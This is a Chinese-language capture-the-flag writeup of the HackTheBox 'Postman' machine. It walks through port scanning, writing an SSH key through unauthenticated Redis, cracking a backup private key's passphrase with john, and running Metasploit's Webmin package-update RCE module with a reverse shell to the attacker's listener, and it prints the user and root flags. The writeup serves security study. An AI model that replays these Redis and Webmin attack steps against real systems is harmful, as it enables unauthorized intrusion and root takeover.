Postman HTB Writeup
2023-03-12 本文已影响0人
doinb1517
logo.png
知识点
1、redis未授权利用
2、msf中利用webmin漏洞直接拿shell
3、有时候常用的nmap扫描语句扫描不全时要复扫全部端口
WP
redis权限
常规nmap扫描一遍,开放了22,80和10000端口
┌──(kali㉿192)-[~]
└─$ nmap -sC -sV 10.10.10.160
Starting Nmap 7.91 ( https://nmap.org ) at 2023-03-13 09:48 CST
Nmap scan report for 10.10.10.160
Host is up (0.30s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 375.88 seconds
直接访问80端口,得到域名,发现了一个欢迎界面
01.png
直接访问10000端口,提示我们使用https协议访问
02.png
换https协议再访问,发现了一个登陆窗口,尝试了几个弱密码登陆没有结果
03.png
尝试目录爆破
gobuster dir -u http://postman/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 20
04.png
跑出来很多无关痛痒的目录,看来这条路走不通,之前使用nmap扫描时候会漏掉很多端口,于是调整目录继续扫描,发现开启了6379端口,redis服务。
nmap -p- 10.10.10.160
PORT STATE SERVICE
6379/tcp open redis
使用redis-cli进行连接,发现不需要授权即可登陆,存在redis未授权漏洞
┌──(kali㉿192)-[~]
└─$ redis-cli -h 10.10.10.160 1 ⨯
10.10.10.160:6379> ping
PONG
10.10.10.160:6379>
我们可以写入SSH公钥文件,首先生成一对ssh公钥和私钥
ssh-keygen -t rsa
在私钥前后写入\n\n
(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > 111.txt
检查redis当前目录,并修改到ssh目录下
10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis"
10.10.10.160:6379> config set dir ./.ssh
OK
10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis/.ssh"
写入ssh公钥
cat 111.txt | redis-cli -h 10.10.10.160 -x set xxx
告诉redis,数据库名称是authorized_keys,并保存
10.10.10.160:6379> config set dbfilename "authorized_keys"
OK
10.10.10.160:6379> save
OK
10.10.10.160:6379>
完成后ssh登陆到靶机,是redis用户
ssh -i id_rsa redis@10.10.10.160
Matt权限
发现了用户Matt
redis@Postman:/home/Matt$ cat user.txt
cat: user.txt: Permission denied
redis@Postman:/home/Matt$ ls -al
total 52
drwxr-xr-x 6 Matt Matt 4096 Sep 11 2019 .
drwxr-xr-x 3 root root 4096 Sep 11 2019 ..
-rw------- 1 Matt Matt 1676 Sep 11 2019 .bash_history
-rw-r--r-- 1 Matt Matt 220 Aug 25 2019 .bash_logout
-rw-r--r-- 1 Matt Matt 3771 Aug 25 2019 .bashrc
drwx------ 2 Matt Matt 4096 Aug 25 2019 .cache
drwx------ 3 Matt Matt 4096 Aug 25 2019 .gnupg
drwxrwxr-x 3 Matt Matt 4096 Aug 25 2019 .local
-rw-r--r-- 1 Matt Matt 807 Aug 25 2019 .profile
-rw-rw-r-- 1 Matt Matt 66 Aug 26 2019 .selected_editor
drwx------ 2 Matt Matt 4096 Aug 26 2019 .ssh
-rw-rw---- 1 Matt Matt 33 Mar 13 01:43 user.txt
-rw-rw-r-- 1 Matt Matt 181 Aug 25 2019 .wget-hsts
redis@Postman:/home/Matt$ ls -al .ssh
ls: cannot open directory '.ssh': Permission denied
redis@Postman:/home/Matt$
发现我们没有权限读取Matt用户的文件,同时Matt用户也有.ssh目录,我们也无权读取,这时候我们尝试看看.bash_history文件,看看有没有突破
redis@Postman:/home/Matt$ cd ~
redis@Postman:~$ pwd
/var/lib/redis
redis@Postman:~$ ls
6379 dkixshbr.so dump.rdb ibortfgq.so module.o qcbxxlig.so vlpaulhk.so
redis@Postman:~$ ls -al
total 660
drwxr-x--- 7 redis redis 4096 Sep 30 2020 .
drwxr-xr-x 38 root root 4096 Sep 29 2020 ..
drwxr-xr-x 2 root root 4096 Oct 25 2019 6379
-rw------- 1 redis redis 399 Oct 25 2019 .bash_history
drwx------ 2 redis redis 4096 Aug 25 2019 .cache
-rw-r----- 1 redis redis 46760 Aug 26 2019 dkixshbr.so
-rw-rw---- 1 redis redis 92 Sep 30 2020 dump.rdb
drwx------ 3 redis redis 4096 Aug 25 2019 .gnupg
-rw-r----- 1 redis redis 46760 Aug 25 2019 ibortfgq.so
drwxrwxr-x 3 redis redis 4096 Aug 26 2019 .local
-rw-r----- 1 redis redis 440656 Aug 25 2019 module.o
-rw-r----- 1 redis redis 46760 Aug 25 2019 qcbxxlig.so
drwxr-xr-x 2 redis root 4096 Mar 13 03:13 .ssh
-rw-r----- 1 redis redis 46760 Aug 25 2019 vlpaulhk.so
redis@Postman:~$ cat .bash_history
exit
su Matt
pwd
nano scan.py
python scan.py
nano scan.py
clear
nano scan.py
clear
python scan.py
exit
exit
cat /etc/ssh/sshd_config
su Matt
clear
cd /var/lib/redis
su Matt
exit
cat id_rsa.bak
ls -la
exit
cat id_rsa.bak
exit
ls -la
crontab -l
systemctl enable redis-server
redis-server
ifconfig
netstat -a
netstat -a
netstat -a
netstat -a
netstat -a > txt
exit
crontab -l
cd ~/
ls
nano 6379
exit
redis@Postman:~$
有一个cat id_rsa.bak命令,我们尝试找找看这个文件
redis@Postman:/tmp$ find / -name id_rsa.bak > /tmp/res.txt
redis@Postman:/tmp$ cat res.txt
/opt/id_rsa.bak
找到一个文件备份文件/opt/id_rsa.bak,使用john破解密码,得到密码computer2008
john xxx.john -w=path_rockyou.txt
05.png
使用账户密码登陆web登陆页面,成功登陆页面
06.png
root权限
使用msf获取shell,直接拿到的就是root权限(不要忘了set ssl true否则不会成功)
msf6 exploit(linux/http/webmin_packageup_rce) > run
[*] Started reverse TCP handler on 10.10.14.4:4444
[-] Exploit aborted due to failure: unknown: Failed to retrieve session cookie
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/webmin_packageup_rce) > show options
Module options (exploit/linux/http/webmin_packageup_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD computer2008 yes Webmin Password
Proxies no A proxy chain of format type:host:por
t[,type:host:port][...]
RHOSTS 10.10.10.160 yes The target host(s), see https://githu
b.com/rapid7/metasploit-framework/wik
i/Using-Metasploit
RPORT 10000 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connec
tions
TARGETURI / yes Base path for Webmin application
USERNAME Matt yes Webmin Username
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.4 yes The listen address (an interface may be s
pecified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Webmin <= 1.910
msf6 exploit(linux/http/webmin_packageup_rce) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 exploit(linux/http/webmin_packageup_rce) > run
[*] Started reverse TCP handler on 10.10.14.4:4444
[+] Session cookie: f243b9ec75daac5f6fa32afc2186aadc
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.4:4444 -> 10.10.10.160:55008) at 2023-03-13 13:23:33 +0800
id
uid=0(root) gid=0(root) groups=0(root)
shell
[*] Trying to find binary 'python' on the target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine
[*] Found bash at /bin/bash
root@Postman:/usr/share/webmin/package-updates/#
root@Postman:/usr/share/webmin/package-updates/# cat /home/Matt/user.txt
cat /home/Matt/user.txt
859ee85473f07d96d588bac79aa247b4
root@Postman:/usr/share/webmin/package-updates/# cat /root/root.txt
cat /root/root.txt
f120ddecc80af581768cb282e8a00bc5
